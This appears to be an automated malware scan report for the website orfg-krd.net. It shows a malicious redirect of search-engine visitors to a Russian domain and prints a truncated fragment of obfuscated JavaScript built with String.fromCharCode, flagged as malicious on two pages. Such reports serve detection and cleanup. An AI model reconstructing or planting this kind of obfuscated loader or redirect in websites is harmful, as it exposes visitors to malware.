Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.orfg-krd.net/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.orfg-krd.net Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=1209600 Connection: close Date: Sun, 31 Aug 2014 05:03:26 GMT Location: http://homedics-russia.ru/clik.php Server: Apache Content-Length: 242 Content-Type: text/html; charset=iso-8859-1 Expires: Sun, 14 Sep 2014 05:03:26 GMT | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.orfg-krd.net/ | 503 Service Unavailable Content-Length: 7668 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ss=String.fromCharCode;asgq=[40,103,119,110,100,118,105,112,112,32,41,43,32,124,15,10,33,34,32,33,120,97,115,34,112,104,105,111,103,34,61,33,102,111,100,119,109,102,112,116,47,101,114,102,99,116,102,71,108,102,111,101,111,118,40,40,107,102,115,99,109,102,41,41,60,15,10,14,12,32,33,34,32,113,105,103,112,104,46,116,116,99,33,63,32,40,106,116,117,114,58,48,49,104,112,111,101,101,107,99,116,47,114,118,117,115,106,99,46,115,119,47,100,110,105,108,48,112,105,114,39,60,15,10,33,34,32,33,114,103,104,113 Antivirus reports:
| ||
http://www.orfg-krd.net/misc/jquery.js?0 | 200 OK Content-Length: 84362 Content-Type: application/javascript | clean |
http://www.orfg-krd.net/misc/drupal.js?0 | 200 OK Content-Length: 9834 Content-Type: application/javascript | clean |
http://www.orfg-krd.net/test404page.js | 503 Service Unavailable Content-Length: 7668 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ss=String.fromCharCode;asgq=[40,103,119,110,100,118,105,112,112,32,41,43,32,124,15,10,33,34,32,33,120,97,115,34,112,104,105,111,103,34,61,33,102,111,100,119,109,102,112,116,47,101,114,102,99,116,102,71,108,102,111,101,111,118,40,40,107,102,115,99,109,102,41,41,60,15,10,14,12,32,33,34,32,113,105,103,112,104,46,116,116,99,33,63,32,40,106,116,117,114,58,48,49,104,112,111,101,101,107,99,116,47,114,118,117,115,106,99,46,115,119,47,100,110,105,108,48,112,105,114,39,60,15,10,33,34,32,33,114,103,104,113 Antivirus reports:
|
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=orfg-krd.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://orfg-krd.net/
Result: orfg-krd.net is not infected or malware details are not published yet.
Result: orfg-krd.net is not infected or malware details are not published yet.